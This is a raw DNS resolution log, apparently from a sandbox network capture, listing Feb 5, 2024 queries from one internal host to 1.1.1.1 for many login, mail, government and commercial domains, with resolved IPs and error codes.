                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.838989973 CET1.1.1.1192.168.2.60x3eddNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.145.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.838989973 CET1.1.1.1192.168.2.60x3eddNo error (0)naukrigulf-com.mail.protection.outlook.com104.47.74.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.838989973 CET1.1.1.1192.168.2.60x3eddNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.145.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.838989973 CET1.1.1.1192.168.2.60x3eddNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.144.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.841553926 CET1.1.1.1192.168.2.60x3eecNo error (0)nossoplayer.me162.241.203.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.857785940 CET1.1.1.1192.168.2.60xc4e8No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.861160994 CET1.1.1.1192.168.2.60xd7d5No error (0)followerstiktok.xyz103.224.182.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.862066984 CET1.1.1.1192.168.2.60xdc16No error (0)foros.net64.190.63.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.867032051 CET1.1.1.1192.168.2.60x9c63No error (0)eei.uniandes.edu.co172.203.148.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.867749929 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.867749929 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.878674030 CET1.1.1.1192.168.2.60x8981No error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.878674030 CET1.1.1.1192.168.2.60x8981No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.878674030 CET1.1.1.1192.168.2.60x8981No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.883192062 CET1.1.1.1192.168.2.60x2a85No error (0)chainmine.io64.91.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885124922 CET1.1.1.1192.168.2.60xe06eNo error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885124922 CET1.1.1.1192.168.2.60xe06eNo error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885144949 CET1.1.1.1192.168.2.60xe06eNo error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885144949 CET1.1.1.1192.168.2.60xe06eNo error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.891324043 CET1.1.1.1192.168.2.60xf8a6No error (0)sigapbanjarmasin.info35.186.223.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.914720058 CET1.1.1.1192.168.2.60x6aedNo error (0)iam.gov.sa78.93.109.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.919867992 CET1.1.1.1192.168.2.60x3753Server failure (2)signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.940807104 CET1.1.1.1192.168.2.60x9e86Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.949553967 CET1.1.1.1192.168.2.60xbe2eNo error (0)uh.is82.221.28.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.954782009 CET1.1.1.1192.168.2.60x2427No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.960376024 CET1.1.1.1192.168.2.60x6bd5No error (0)mitextoescolar.mineduc.cl163.247.44.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.963051081 CET1.1.1.1192.168.2.60x9633No error (0)service.uan.edu.co186.28.225.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.968729973 CET1.1.1.1192.168.2.60xfa74Name error (3)netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.989564896 CET1.1.1.1192.168.2.60x1fe1No error (0)mw.redsa.net77.240.114.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.029937029 CET1.1.1.1192.168.2.60x82beName error (3)etd.lib.tuke.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.068164110 CET1.1.1.1192.168.2.60x4e92No error (0)kwyk.fr34.250.93.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.087120056 CET1.1.1.1192.168.2.60x13f3No error (0)www2.personas.santander.com.ar200.61.38.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113547087 CET1.1.1.1192.168.2.60xc4e8No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113620996 CET1.1.1.1192.168.2.60x482fNo error (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113636017 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113636017 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113713026 CET1.1.1.1192.168.2.60x82beName error (3)etd.lib.tuke.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113728046 CET1.1.1.1192.168.2.60xd7d5No error (0)followerstiktok.xyz103.224.182.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113742113 CET1.1.1.1192.168.2.60x6bd5No error (0)mitextoescolar.mineduc.cl163.247.44.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113755941 CET1.1.1.1192.168.2.60x3eecNo error (0)nossoplayer.me162.241.203.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113882065 CET1.1.1.1192.168.2.60xdaa4No error (0)api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113882065 CET1.1.1.1192.168.2.60xdaa4No error (0)cmrsanmartin.ziz.cl138.197.59.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113908052 CET1.1.1.1192.168.2.60xccc9Name error (3)app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113965988 CET1.1.1.1192.168.2.60xdc16No error (0)foros.net64.190.63.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113981009 CET1.1.1.1192.168.2.60x9418No error (0)21dukes.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.114041090 CET1.1.1.1192.168.2.60xfa74Name error (3)netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.114144087 CET1.1.1.1192.168.2.60x991aName error (3)tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115289927 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com104.21.71.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115289927 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com172.67.170.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115362883 CET1.1.1.1192.168.2.60xf8a6No error (0)sigapbanjarmasin.info35.186.223.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115377903 CET1.1.1.1192.168.2.60x1093No error (0)mobilsam.com178.16.128.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115470886 CET1.1.1.1192.168.2.60x13f3No error (0)www2.personas.santander.com.ar200.61.38.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115523100 CET1.1.1.1192.168.2.60xf26cNo error (0)transaccional.saludtotal.com.co190.216.203.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115537882 CET1.1.1.1192.168.2.60x2427No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115612984 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve190.202.89.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115612984 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve200.11.221.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115612984 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve190.202.2.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115628004 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.42.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115628004 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.43.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115628004 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com172.67.11.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115642071 CET1.1.1.1192.168.2.60xfb54No error (0)secure.vexcorp.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115642071 CET1.1.1.1192.168.2.60xfb54No error (0)secure.vexcorp.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115657091 CET1.1.1.1192.168.2.60xde01No error (0)authenticate.riotgames.comauthenticate.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115670919 CET1.1.1.1192.168.2.60xb755No error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115670919 CET1.1.1.1192.168.2.60xb755No error (0)secure.imvu.sl.smartling.com52.52.207.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115670919 CET1.1.1.1192.168.2.60xb755No error (0)secure.imvu.sl.smartling.com54.183.63.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115685940 CET1.1.1.1192.168.2.60x736fNo error (0)accounts.binance.comd2dbdn71e1vorj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115685940 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115685940 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115685940 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115685940 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115700960 CET1.1.1.1192.168.2.60xf381No error (0)phonandroid.com194.169.240.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115700960 CET1.1.1.1192.168.2.60xf381No error (0)phonandroid.com195.248.251.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115745068 CET1.1.1.1192.168.2.60xda7aNo error (0)ngoalongvn.com103.90.225.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115760088 CET1.1.1.1192.168.2.60x32b3No error (0)warriorplus.com172.66.40.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115760088 CET1.1.1.1192.168.2.60x32b3No error (0)warriorplus.com172.66.43.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115775108 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk104.22.75.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115775108 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk172.67.9.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115775108 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk104.22.74.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115935087 CET1.1.1.1192.168.2.60xe277No error (0)sport.autoplay.cloud104.18.32.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115935087 CET1.1.1.1192.168.2.60xe277No error (0)sport.autoplay.cloud172.64.155.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115957022 CET1.1.1.1192.168.2.60x1b2No error (0)login.adf.ly172.66.40.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115957022 CET1.1.1.1192.168.2.60x1b2No error (0)login.adf.ly172.66.43.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.116086006 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.116086006 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.116086006 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.116086006 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.116086006 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.117438078 CET1.1.1.1192.168.2.60x6aedNo error (0)iam.gov.sa78.93.109.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.117454052 CET1.1.1.1192.168.2.60xf409Server failure (2)brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.117522955 CET1.1.1.1192.168.2.60x69f3No error (0)hero-wars.com18.200.3.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118174076 CET1.1.1.1192.168.2.60x348fNo error (0)netizion.com104.21.60.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118174076 CET1.1.1.1192.168.2.60x348fNo error (0)netizion.com172.67.200.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118303061 CET1.1.1.1192.168.2.60x8114No error (0)accounts.snapchat.comweb-gcp.api.snapchat.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118303061 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.snapchat.comweb-gcp.api.sc-gw.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118303061 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.sc-gw.com34.149.46.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118352890 CET1.1.1.1192.168.2.60x4e2eNo error (0)accounts.google.com142.250.105.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118551016 CET1.1.1.1192.168.2.60xbe2eNo error (0)uh.is82.221.28.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118645906 CET1.1.1.1192.168.2.60x1fe1No error (0)mw.redsa.net77.240.114.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118727922 CET1.1.1.1192.168.2.60x4e92No error (0)kwyk.fr34.250.93.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118760109 CET1.1.1.1192.168.2.60x242No error (0)instructory.net36.255.71.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118860006 CET1.1.1.1192.168.2.60x8981No error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118860006 CET1.1.1.1192.168.2.60x8981No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.118860006 CET1.1.1.1192.168.2.60x8981No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.124895096 CET1.1.1.1192.168.2.60x9e86Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.148037910 CET1.1.1.1192.168.2.60x99b8Name error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.148070097 CET1.1.1.1192.168.2.60x99b8Name error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.153949022 CET1.1.1.1192.168.2.60x425fNo error (0)aspmx.l.google.com173.194.219.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)ucv.blackboard.comlearn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.158.51.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com52.6.30.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.195.133.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.194.231.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163278103 CET1.1.1.1192.168.2.60x5f38No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.205.118.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.174788952 CET1.1.1.1192.168.2.60xb22bNo error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.174804926 CET1.1.1.1192.168.2.60xb22bNo error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.189687014 CET1.1.1.1192.168.2.60x2537No error (0)v.xsanime.com104.21.85.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.189687014 CET1.1.1.1192.168.2.60x2537No error (0)v.xsanime.com172.67.204.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.199032068 CET1.1.1.1192.168.2.60x1597No error (0)easygold.joyalukkas.com20.192.98.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.203555107 CET1.1.1.1192.168.2.60x15a0No error (0)sistemas.pa.gov.br177.74.1.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.203651905 CET1.1.1.1192.168.2.60x15a0No error (0)sistemas.pa.gov.br177.74.1.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.213044882 CET1.1.1.1192.168.2.60xbd75No error (0)ventas.officeinsumos.com.ar181.4.228.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.213079929 CET1.1.1.1192.168.2.60xbd75No error (0)ventas.officeinsumos.com.ar181.4.228.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.227721930 CET1.1.1.1192.168.2.60x4a2bNo error (0)zuhauseplus.vodafone.deqcolamq.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.227721930 CET1.1.1.1192.168.2.60x4a2bNo error (0)qcolamq.impervadns.net45.60.74.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.227816105 CET1.1.1.1192.168.2.60x4a2bNo error (0)zuhauseplus.vodafone.deqcolamq.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.227816105 CET1.1.1.1192.168.2.60x4a2bNo error (0)qcolamq.impervadns.net45.60.74.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.230079889 CET1.1.1.1192.168.2.60x1973No error (0)virtuadopt.com104.21.34.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.230079889 CET1.1.1.1192.168.2.60x1973No error (0)virtuadopt.com172.67.167.217A (IP address)IN (0x0001)false
